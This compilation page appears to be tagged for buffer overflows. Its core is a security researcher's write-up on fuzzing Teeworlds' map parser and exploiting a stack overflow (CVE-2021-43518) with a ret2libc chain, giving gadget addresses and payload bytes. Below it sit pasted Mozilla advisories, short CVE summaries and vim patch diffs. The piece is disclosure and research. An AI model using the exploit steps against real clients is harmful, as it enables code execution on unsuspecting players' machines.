Teeworlds up to and including 0.7.5 is vulnerable to Buffer Overflow. A map parser does not validate m_Channels value coming from a map file, leading to a buffer overflow. A malicious server may offer a specially crafted map that will overwrite client's stack causing denial of service or code execution.

**tl;dr**: Using AFLplusplus for fuzzing map parser in Teeworlds. Two different approaches (quick and thorough) result in 15 crashes in total (one exploitable).

**Intro**

Games that support loading custom maps have to deal with parsing pretty complex files and complexity may lead to bugs. It may be especially important for online games, where players connecting to a server download and parse missing map files. If players can to set up their servers and offer custom maps then this process may be abused. A malicious server may cause unaware players to download a specially crafted map and cause unexpected behavior (desirable code execution). I decided to focus more on that topic and select an online game that can serve custom maps to players joining a game.

As my first target, I chose Teeworlds, an online shooter that I had analyzed before but from a different angle. The game has a map editor and players joining a game automatically download a missing map. This behavior makes this game a great candidate for research.

**Preparation**

The game’s source code is available at GitHub and documented instructions are enough to build the game on Ubuntu 20.04. However, before building the game with AFLplusplus I had to introduce some changes to the code to make fuzzing possible and efficient - more details in a moment.

Besides the code changes, I also needed input files. I decided to take the smallest original map that is available in the game.

    $ ls -laS datasrc/maps/
    total 348
    [...]
    -rw-rw-r--  1 m m  5731 Oct 22 16:19 ctf1.map
    [...]
    

Its size was quite big but at least the map was valid and I was sure that it parses correctly.

**Approach 1 - quick**

Running the game to parse a map has its drawbacks. When the game starts it loads a map from a file and then during the whole gameplay uses its data for rendering, calculations, and so on. I had to decide at which moment of execution I want to stop it. I was curious if bugs are more likely to happen in code that is responsible for reading a map from a file and preparing data structures or rather in later phases when this data is being used. There was nothing left to do but check both cases.

So for the first case, I took stopping the game immediately after parsing a file. I found a suitable place in the code - after all necessary initialization - and invoked parsing a map. A filename passed to a method was hardcoded because in a normal situation a client receives a filename from a server.

    diff --git a/src/engine/client/client.cpp b/src/engine/client/client.cpp
    index b9a2e014..4b5a9e16 100644
    --- a/src/engine/client/client.cpp
    +++ b/src/engine/client/client.cpp
    @@ -1842,6 +1842,10 @@ void CClient::InitInterfaces()
            m_Blacklist.Init();
            m_DemoRecorder.Init(Console(), m_pStorage);
            m_DemoPlayer.Init(Console(), m_pStorage);
    +
    +       __AFL_INIT();
    +       m_pMap->Load("maps/666.map");
    +       exit(0);
     }
    

At that point, I was ready to build and start fuzzing.

**Approach 2 - thorough**

When the process of fuzzing the first case was ongoing, I looked into the source code again to cause the game to parse and really use map data but also to exit in a reasonable time. In this case, communication with a server was necessary to cause the gameplay to start.

I ended up introducing the following changes:

1.  Disable CRC and SHA256 checksum checking - these values are sent by a server just to be sure that both sides use the same file. For fuzzing, those checks could be ignored.
2.  Exit the game after 150 frames. This value was chosen as the result of experimentation and was enough for the game to display a map on the screen.

    diff --git a/src/engine/client/client.cpp b/src/engine/client/client.cpp
    index b9a2e014..4b5a9e16 100644
    --- a/src/engine/client/client.cpp
    +++ b/src/engine/client/client.cpp
    @@ -810,7 +810,7 @@ const char *CClient::LoadMap(const char *pName, const char *pFilename, const SHA
                    return aErrorMsg;
            }
     
    -       if(pWantedSha256 && m_pMap->Sha256() != *pWantedSha256)
    +       if(0 && pWantedSha256 && m_pMap->Sha256() != *pWantedSha256)
            {
                    char aSha256[SHA256_MAXSTRSIZE];
                    char aWantedSha256[SHA256_MAXSTRSIZE];
    @@ -823,7 +823,7 @@ const char *CClient::LoadMap(const char *pName, const char *pFilename, const SHA
            }
     
            // get the crc of the map
    -       if(m_pMap->Crc() != WantedCrc)
    +       if(0 && m_pMap->Crc() != WantedCrc)
            {
                    str_format(aErrorMsg, sizeof(aErrorMsg), "map differs from the server. found = %08x wanted = %08x", m_pMap->Crc(), WantedCrc);
                    m_pConsole->Print(IConsole::OUTPUT_LEVEL_ADDINFO, "client", aErrorMsg);
    @@ -1999,7 +2003,7 @@ void CClient::Run()
            char aBuf[256];
            str_format(aBuf, sizeof(aBuf), "netversion %s", GameClient()->NetVersion());
            m_pConsole->Print(IConsole::OUTPUT_LEVEL_STANDARD, "client", aBuf);
    -       if(str_comp(GameClient()->NetVersionHashUsed(), GameClient()->NetVersionHashReal()))
    +       if(0 && str_comp(GameClient()->NetVersionHashUsed(), GameClient()->NetVersionHashReal()))
            {
                    m_pConsole->Print(IConsole::OUTPUT_LEVEL_STANDARD, "client", "WARNING: netversion hash differs");
            }
    @@ -2128,7 +2132,10 @@ void CClient::Run()
                                    // when we are stress testing only render every 10th frame
                                    if(!Config()->m_DbgStress || (m_RenderFrames%10) == 0 )
                                    {
    +                                       static int fuzz_counter = 0;
    +                                       fuzz_counter++;
                                            Render();
    +                                       if (fuzz_counter == 150) exit(0);
                                            m_pGraphics->Swap();
    

To make the fuzzing work, I had to run the server and make the fuzzed client connect to it. Hopefully, all necessary options were already implemented as command line parameters.

    $ echo 'sv_map 666' > config.cfg
    $ ./teeworlds_srv -f config.cfg
    

    $ ./afl-fuzz -f /home/mmm/teeworlds/build/data/maps/666.map -i - -o /home/mmm/output -t 5000 -- ./teeworlds "connect 127.0.0.1" "gfx_fullscreen 0" "gfx_screen_height 240" "gfx_screen_width 360"
    

The -f parameter points to a file where AFLplusplus was saving its mutated input. Even though the client was connecting to the server, it was noticing that already had a map with the desired name so it was loading it from the disk instead of downloading from the server.

An additional profit of this approach was the possibility to observe what the fuzzer was changing in the map file. It didn’t have any value for the fuzzing but at least was fun to watch.

**Coverage**

After approximately 24 hours I decided to check the results. To my surprise, both approaches turned out to be successful. The first approach was much faster but covered less code than the painfully slow second approach.

I used afl-cov to generate code coverage reports for the initial test case as well as for all entries generated by AFL during the fuzzing. In that way, it’s visible how much code the fuzzing actually covered.

*   First approach
    *   initial test case - lines: **5.2%**, functions: **7.9%**
    *   whole fuzzing - lines: **5.3**, functions: **8.1%**
*   Second approach
    *   initial test case - lines: **26.7%**, functions: **35.4%**
    *   whole fuzzing - lines: **29.2%**, functions: **37%**

Commands used for generating a report for:

*   the initial test case
    
        afl-cov -d /home/mmm/teeworlds/output/ --coverage-cmd "./teeworlds 'connect 127.0.0.1' 'gfx_fullscreen 0' 'gfx_screen_height 240' 'gfx_screen_width 360'" --code-dir /home/mmm/teeworlds-afl-cov/  --afl-file /home/mmm/teeworlds-afl-cov/build/data/maps/666.map --afl-queue-id-limit 1
        
    
*   all entries
    
        afl-cov -d /home/mmm/teeworlds/output/ --coverage-cmd "./teeworlds 'connect 127.0.0.1' 'gfx_fullscreen 0' 'gfx_screen_height 240' 'gfx_screen_width 360'" --code-dir /home/mmm/teeworlds-afl-cov/  --afl-file /home/mmm/teeworlds-afl-cov/build/data/maps/666.map
        
    

The --afl-file parameter may look unfamiliar because I implemented it for this specific case. At the moment of writing, afl-cov does not support passing an input file in a way that AFL’s -f parameter does. The change is currently available here.

**Results**

The first approach resulted in **4** unique crashes. The second approach was responsible for **11** more unique crashes.

I reported all crashes on GitHub:

*   Null pointer dereference (read)
    *   https://github.com/teeworlds/teeworlds/issues/2968
    *   https://github.com/teeworlds/teeworlds/issues/2973
    *   https://github.com/teeworlds/teeworlds/issues/2980
*   Heap buffer overflow (read)
    *   https://github.com/teeworlds/teeworlds/issues/2969
    *   https://github.com/teeworlds/teeworlds/issues/2971
    *   https://github.com/teeworlds/teeworlds/issues/2972
    *   https://github.com/teeworlds/teeworlds/issues/2974
    *   https://github.com/teeworlds/teeworlds/issues/2975
    *   https://github.com/teeworlds/teeworlds/issues/2976
    *   https://github.com/teeworlds/teeworlds/issues/2977
    *   https://github.com/teeworlds/teeworlds/issues/2978
    *   https://github.com/teeworlds/teeworlds/issues/2979
    *   https://github.com/teeworlds/teeworlds/issues/2982
*   Stack buffer overflow (write)
    *   https://github.com/teeworlds/teeworlds/issues/2981 (CVE-2021-43518)
*   Use after free (read)
    *   https://github.com/teeworlds/teeworlds/issues/2970

**Crash analysis**

From those crashes, the one related to writing on the stack seemed to be most interesting.

    ==33805==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffffffd8f78 at pc 0x5555556fae80 bp 0x7ffffffd8e10 sp 0x7ffffffd8e00
    WRITE of size 4 at 0x7ffffffd8f78 thread T0
        #0 0x5555556fae7f in CMapLayers::LoadEnvPoints(CLayers const*, array<CEnvPoint, allocator_default<CEnvPoint> >&) /home/osboxes/teeworlds/teeworlds-asan/src/game/client/components/maplayers.cpp:184
        #1 0x5555556fcf3b in CMapLayers::OnMapLoad() /home/osboxes/teeworlds/teeworlds-asan/src/game/client/components/maplayers.cpp:117
        #2 0x555555839981 in CGameClient::OnConnected() /home/osboxes/teeworlds/teeworlds-asan/src/game/client/gameclient.cpp:459
        #3 0x5555555f6755 in CClient::ProcessServerPacket(CNetChunk*) /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1283
        #4 0x5555555f91ce in CClient::PumpNetwork() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1596
        #5 0x5555555f9596 in CClient::Update() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1766
        #6 0x5555555fc1f0 in CClient::Run() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:2108
        #7 0x5555555d24e5 in main /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:2704
        #8 0x7ffff68e10b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #9 0x5555555dc48d in _start (/home/osboxes/teeworlds/teeworlds-asan/build/teeworlds+0x8848d)
    

    [...]
    169:  for(int i = 0; i < pItem->m_NumPoints; i++)
    170:  {
    171:          // convert CEnvPoint_v1 -> CEnvPoint
    172:          CEnvPoint_v1 *pEnvPoint_v1 = &((CEnvPoint_v1 *)pPoints)[i + pItem->m_StartPoint];
    173:          CEnvPoint p;
    174:  
    175:          p.m_Time = pEnvPoint_v1->m_Time;
    176:          p.m_Curvetype = pEnvPoint_v1->m_Curvetype;
    177:  
    178:          for(int c = 0; c < pItem->m_Channels; c++)
    179:          {
    180:                  p.m_aValues[c] = pEnvPoint_v1->m_aValues[c];
    181:                  p.m_aInTangentdx[c] = 0;
    182:                  p.m_aInTangentdy[c] = 0;
    183:                  p.m_aOutTangentdx[c] = 0;
    184:                  p.m_aOutTangentdy[c] = 0;
    185:          }
    [...]
    

pItem->m_Channels and pEnvPoint_v1->m_aValues are values coming from the map file. The nested loop lacks additional condition and allows writing outside the p.m_aValues 4-element array.

    struct CEnvPoint : public CEnvPoint_v1
    {
            // bezier curve only
            // dx in ms and dy as 22.10 fxp
            int m_aInTangentdx[4];
            int m_aInTangentdy[4];
            int m_aOutTangentdx[4];
            int m_aOutTangentdy[4];
    
            bool operator<(const CEnvPoint& other) const { return m_Time < other.m_Time; }
    };
    

It looked promising, however, I didn’t find a working way to exploit it, and as it wasn’t the main area of my effort I postponed it for another time.

Update: As a friend pointed out and put me in the right direction, I did a mistake analyzing an optimized code (which was weird for a project compiled with the -O0 flag which was caused by using a release target in cmake that enables optimization). However, the official build does not have an optimized code that broke exploitation attempts. Additionally, the binary even has the stack protection disabled what makes it even easier.

    $ checksec --file=teeworlds 
    RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
    Partial RELRO   No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   4168) Symbols     No    0               12              teeworlds
    

With a little modification made to the map, I overwrote the instruction pointer.

    $ gdb --args ./teeworlds 'connect 127.0.0.1' 
    [...]
    Thread 1 "teeworlds" received signal SIGSEGV, Segmentation fault.
    0x000000aabbccddee in ?? ()
    

**Exploit**

I decided to exploit it just for fun. Unfortunately, there were no other bugs that could be chained to bypass ASLR. For the purpose of the exercise, I continued with ASLR disabled and use ret2libc technique to pop a calc executing system("/usr/bin/xcalc").

To succeed with ret2libc exploit, I required the following things:

1.  Gadget with ret and pop rdi; ret instructions to align the stack, load the parameter for the system function and jump to it
    
        $ ROPgadget --binary teeworlds | grep 'pop rdi ; ret'
        [...]
        0x0000000000011339 : pop rdi ; ret
        [...]
        
    
    *   The pop rdi; ret instructions were at offset 0x011339 and the sole ret at 0x011339
    *   To make use of those instructions it was also necessary to calculate their absolute addresses by adding their offsets to the address at which the binary was loaded.
        
            (gdb) info proc mappings
            process 13108
            Mapped address spaces:
            
               Start Addr           End Addr       Size     Offset objfile
               0x555555554000     0x555555695000   0x141000        0x0 /home/osboxes/Downloads/teeworlds-0.7.5-linux_x86_64/teeworlds
            
        
        *   0x555555554000 + 0x01133A = 0x55555556533A
        *   0x555555554000 + 0x011339 = 0x555555565339
2.  Address of the system function
    
        (gdb) p system
        $3 = {int (const char *)} 0x7ffff76c9410 <__libc_system>
        
    
3.  Address of the /usr/bin/xcalc string
    *   I put the string in that part of the map that was written to the stack. The exact address I found by examining available strings on the stack under gdb.
        
            0x7ffffffddc20: "/usr/bin/xcalc"
            
        

Having all the prerequisites, I combined them into a final exploit: 3A535655555500 39535655555500 20DCFDFFFF7F00 10946CF7FF7F00 and I put it in the place of the value that was messing with the instruction pointer. So that time when the map was loaded, the stack was overwritten with valid addresses that redirected execution into the system function with the desired parameter.

**Additional bug**

When running with ASAN, the game was crashing immediately and reporting use after free error. To avoid this problem during the fuzzing I disabled ASAN for the faulty method.

    diff --git a/src/game/client/components/menus_browser.cpp b/src/game/client/components/menus_browser.cpp
    index 85f1bde1..d0cb938d 100644
    --- a/src/game/client/components/menus_browser.cpp
    +++ b/src/game/client/components/menus_browser.cpp
    @@ -1,3 +1,8 @@
    +#if defined(__clang__) || defined (__GNUC__)
    +# define ATTRIBUTE_NO_SANITIZE_ADDRESS __attribute__((no_sanitize_address))
    +#else
    +# define ATTRIBUTE_NO_SANITIZE_ADDRESS
    +#endif
     /* (c) Magnus Auvinen. See licence.txt in the root of the distribution for more information. */
     /* If you are missing that file, acquire a complete release at teeworlds.com.                */
     #include <algorithm> // sort  TODO: remove this
    @@ -75,6 +80,7 @@ void CMenus::CBrowserFilter::Reset()
            }
     }
     
    +ATTRIBUTE_NO_SANITIZE_ADDRESS
     void CMenus::CBrowserFilter::Switch()
     {
            m_Extended ^= 1;
    

This small teebug was also reported: https://github.com/teeworlds/teeworlds/issues/2967

**Summary**

Two approaches to fuzzing a map parser detected **15** crashes in total. All of those findings could be used to set up a malicious server and mess up clients’ memory and crash them. One of them turned out to be serious enough to allow code execution. As the results appeared satisfying I will look into other online games as well.

CVE-2021-43518: Fuzzing game map parsers, part 1

IBM Spectrum Protect Client 7.1 and 8.1 is vulnerable to a stack based buffer overflow, caused by improper bounds checking. A local attacker could exploit this vulnerability and cause a denial of service. IBM X-Force ID: 214438.

CVE-2021-39048: IBM Spectrum Protect buffer overflow CVE-2021-39048 Vulnerability Report

Using XMLHttpRequest, an attacker could have identified installed applications by probing error messages for loading external protocols. This vulnerability affects Thunderbird < 91.4.0, Firefox ESR < 91.4.0, and Firefox < 95.

**Mozilla Foundation Security Advisory 2021-52**

Announced

December 7, 2021

Impact

high

Products

Firefox

Fixed in

*   Firefox 95

**#CVE-2021-43536: URL leakage when navigating while executing asynchronous function**

Reporter

Sunwoo Kim and Youngmin Kim of SNU CompSec Lab

Impact

high

**Description**

Under certain circumstances, asynchronous functions could have caused a navigation to fail but expose the target URL.

**References**

*   Bug 1730120

**#CVE-2021-43537: Heap buffer overflow when using structured clone**

Reporter

bo13oy of Cyber Kunlun Lab

Impact

high

**Description**

An incorrect type conversion of sizes from 64bit to 32bit integers allowed an attacker to corrupt memory leading to a potentially exploitable crash.

**References**

*   Bug 1738237

**#CVE-2021-43538: Missing fullscreen and pointer lock notification when requesting both**

Reporter

Irvan Kurniawan (@sourc7)

Impact

high

**Description**

By misusing a race in our notification code, an attacker could have forcefully hidden the notification for pages that had received full screen and pointer lock access, which could have been used for spoofing attacks.

**References**

*   Bug 1739091

**#CVE-2021-43539: GC rooting failure when calling wasm instance methods**

Reporter

Asumu Takikawa and Ioanna Dimitriou

Impact

high

**Description**

Failure to correctly record the location of live pointers across wasm instance calls resulted in a GC occurring within the call not tracing those live pointers. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1739683

**#CVE-2021-4128: Use-after-free in fullscreen objects on MacOS**

Reporter

Atila Butkovits

Impact

high

**Description**

When transitioning in and out of fullscreen mode, a graphics object was not correctly protected; resulting in memory corruption and a potentially exploitable crash.  
_This bug only affects Firefox on MacOS. Other operating systems are unaffected._

**References**

*   Bug 1735852

**#CVE-2021-43540: WebExtensions could have installed persistent ServiceWorkers**

Reporter

Jake Heath

Impact

moderate

**Description**

WebExtensions with the correct permissions were able to create and install ServiceWorkers for third-party websites that would not have been uninstalled with the extension.

**References**

*   Bug 1636629

**#CVE-2021-43541: External protocol handler parameters were unescaped**

Reporter

chriscla

Impact

moderate

**Description**

When invoking protocol handlers for external protocols, a supplied parameter URL containing spaces was not properly escaped.

**References**

*   Bug 1696685

**#CVE-2021-43542: XMLHttpRequest error codes could have leaked the existence of an external protocol handler**

Reporter

Raphael Smolik

Impact

moderate

**Description**

Using XMLHttpRequest, an attacker could have identified installed applications by probing error messages for loading external protocols.

**References**

*   Bug 1723281

**#CVE-2021-43543: Bypass of CSP sandbox directive when embedding**

Reporter

Armin Ebert

Impact

moderate

**Description**

Documents loaded with the CSP sandbox directive could have escaped the sandbox's script restriction by embedding additional content.

**References**

*   Bug 1738418

**#CVE-2021-43544: Receiving a malicious URL as text through a SEND intent could have led to XSS**

Reporter

Irwan

Impact

moderate

**Description**

When receiving a URL through a SEND intent, Firefox would have searched for the text, but subsequent usages of the address bar might have caused the URL to load unintentionally, which could lead to XSS and spoofing attacks.  
_This bug only affects Firefox for Android. Other operating systems are unaffected._

**References**

*   Bug 1739934

**#CVE-2021-43545: Denial of Service when using the Location API in a loop**

Reporter

Paul Zühlcke

Impact

low

**Description**

Using the Location API in a loop could have caused severe application hangs and crashes.

**References**

*   Bug 1720926

**#CVE-2021-43546: Cursor spoofing could overlay user interface when native cursor is zoomed**

Reporter

Daniel Veditz

Impact

low

**Description**

It was possible to recreate previous cursor spoofing attacks against users with a zoomed native cursor.

**References**

*   Bug 1737751

**#CVE-2021-4129: Memory safety bugs fixed in Firefox 95 and Firefox ESR 91.4**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Julian Hector, Randell Jesup, Gabriele Svelto, Tyson Smith, Christian Holler, and Masayuki Nakano reported memory safety bugs present in Firefox 94. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 95

CVE-2021-43542: Security Vulnerabilities fixed in Firefox 95

Thunderbird unexpectedly enabled JavaScript in the composition area. The JavaScript execution context was limited to this area and did not receive chrome-level privileges, but could be used as a stepping stone to further an attack with other vulnerabilities. This vulnerability affects Thunderbird < 91.4.0.

**Mozilla Foundation Security Advisory 2021-54**

Announced

December 7, 2021

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 91.4

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2021-43536: URL leakage when navigating while executing asynchronous function**

Reporter

Sunwoo Kim and Youngmin Kim of SNU CompSec Lab

Impact

high

**Description**

Under certain circumstances, asynchronous functions could have caused a navigation to fail but expose the target URL.

**References**

*   Bug 1730120

**#CVE-2021-43537: Heap buffer overflow when using structured clone**

Reporter

bo13oy of Cyber Kunlun Lab

Impact

high

**Description**

An incorrect type conversion of sizes from 64bit to 32bit integers allowed an attacker to corrupt memory leading to a potentially exploitable crash.

**References**

*   Bug 1738237

**#CVE-2021-43538: Missing fullscreen and pointer lock notification when requesting both**

Reporter

Irvan Kurniawan (@sourc7)

Impact

high

**Description**

By misusing a race in our notification code, an attacker could have forcefully hidden the notification for pages that had received full screen and pointer lock access, which could have been used for spoofing attacks.

**References**

*   Bug 1739091

**#CVE-2021-43539: GC rooting failure when calling wasm instance methods**

Reporter

Asumu Takikawa and Ioanna Dimitriou

Impact

high

**Description**

Failure to correctly record the location of live pointers across wasm instance calls resulted in a GC occurring within the call not tracing those live pointers. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1739683

**#CVE-2021-43541: External protocol handler parameters were unescaped**

Reporter

chriscla

Impact

moderate

**Description**

When invoking protocol handlers for external protocols, a supplied parameter URL containing spaces was not properly escaped.

**References**

*   Bug 1696685

**#CVE-2021-43542: XMLHttpRequest error codes could have leaked the existence of an external protocol handler**

Reporter

Raphael Smolik

Impact

moderate

**Description**

Using XMLHttpRequest, an attacker could have identified installed applications by probing error messages for loading external protocols.

**References**

*   Bug 1723281

**#CVE-2021-43543: Bypass of CSP sandbox directive when embedding**

Reporter

Armin Ebert

Impact

moderate

**Description**

Documents loaded with the CSP sandbox directive could have escaped the sandbox's script restriction by embedding additional content.

**References**

*   Bug 1738418

**#CVE-2021-43545: Denial of Service when using the Location API in a loop**

Reporter

Paul Zühlcke

Impact

low

**Description**

Using the Location API in a loop could have caused severe application hangs and crashes.

**References**

*   Bug 1720926

**#CVE-2021-43546: Cursor spoofing could overlay user interface when native cursor is zoomed**

Reporter

Daniel Veditz

Impact

low

**Description**

It was possible to recreate previous cursor spoofing attacks against users with a zoomed native cursor.

**References**

*   Bug 1737751

**#CVE-2021-43528: JavaScript unexpectedly enabled for the composition area**

Reporter

Pedro Batista

Impact

low

**Description**

Thunderbird unexpectedly enabled JavaScript in the composition area. The JavaScript execution context was limited to this area and did not receive chrome-level privileges, but could be used as a stepping stone to further an attack with other vulnerabilities.

**References**

*   Bug 1742579

**#CVE-2021-4129: Memory safety bugs fixed in Thunderbird 91.4.0**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Julian Hector, Randell Jesup, Gabriele Svelto, Tyson Smith, Christian Holler, and Masayuki Nakano reported memory safety bugs present in Thunderbird 91.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Thunderbird 91.4.0

CVE-2021-43528: Security Vulnerabilities fixed in Thunderbird 91.4.0

A buffer overflow [CWE-121] in the TFTP client library of FortiOS before 6.4.7 and FortiOS 7.0.0 through 7.0.2, may allow an authenticated local attacker to achieve arbitrary code execution via specially crafted command line arguments.

CVE-2021-42757

AOM v2.0.1 was discovered to contain a global buffer overflow via the component av1/encoder/partition_search.h.

CVE-2020-36133

AOM v2.0.1 was discovered to contain a stack buffer overflow via the component stats/rate_hist.c.

CVE-2020-36131

NetworkPkg/IScsiDxe has remotely exploitable buffer overflows.

Reporting Issues

'3356?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2021-38575: Invalid Bug ID

vim is vulnerable to Heap-based Buffer Overflow

@@ -1637,10 +1637,10 @@ get\_baseclass\_amount(int col)

static pos\_T \*

find\_start\_brace(void) // XXX

{

pos\_T cursor\_save;

pos\_T \*trypos;

pos\_T \*pos;

static pos\_T pos\_copy;

pos\_T cursor\_save;

pos\_T \*trypos;

pos\_T \*pos;

static pos\_T pos\_copy;

  

cursor\_save = curwin->w\_cursor;

while ((trypos = findmatchlimit(NULL, '{', FM\_BLOCKSTOP, 0)) != NULL)

@@ -1654,7 +1654,7 @@ find\_start\_brace(void) // XXX

&& (pos = ind\_find\_start\_CORS(NULL)) == NULL) // XXX

break;

if (pos != NULL)

curwin->w\_cursor.lnum = pos\->lnum;

curwin->w\_cursor = \*pos;

}

curwin->w\_cursor = cursor\_save;

return trypos;

CVE-2021-3984: patch 8.2.3625: illegal memory access when C-indenting · vim/vim@2de9b7c

Permalink

Browse files

patch 8.2.3669: buffer overflow with long help argument

Problem:    Buffer overflow with long help argument.
Solution:   Use snprintf().

*   Loading branch information

1 parent bb277fd commit bd228fd097b41a798f90944b5d1245eddd484142

Showing **3 changed files** with **12 additions** and **2 deletions**.

*   *   help.c
    *   *   test\_help.vim
    *   version.c

@@ -422,8 +422,7 @@ find\_help\_tags(

|| (vim\_strchr((char\_u \*)"%\_z@", arg\[1\]) != NULL

&& arg\[2\] != NUL)))

{

STRCPY(d, "/\\\\\\\\");

STRCPY(d + 3, arg + 1);

vim\_snprintf((char \*)d, IOSIZE, "/\\\\\\\\%s", arg + 1);

// Check for "/\\\\\_$", should be "/\\\\\_\\$"

if (d\[3\] == '\_' && d\[4\] == '$')

STRCPY(d + 4, "\\\\$");

@@ -134,4 +134,13 @@ func Test\_help\_window\_height()

close

endfunc

  

func Test\_help\_long\_argument()

try

exe 'help \\%' .. repeat('0', 1021)

catch

call assert\_match("E149:", v:exception)

endtry

endfunc

  

  

" vim: shiftwidth\=2 sts\=2 expandtab

@@ -757,6 +757,8 @@ static char \*(features\[\]) =

  

static int included\_patches\[\] =

{ /\* Add new patch number below this line \*/

/\*\*/

3669,

/\*\*/

3668,

/\*\*/

**0 comments on commit bd228fd**

Please sign in to comment.

Tag

#buffer_overflow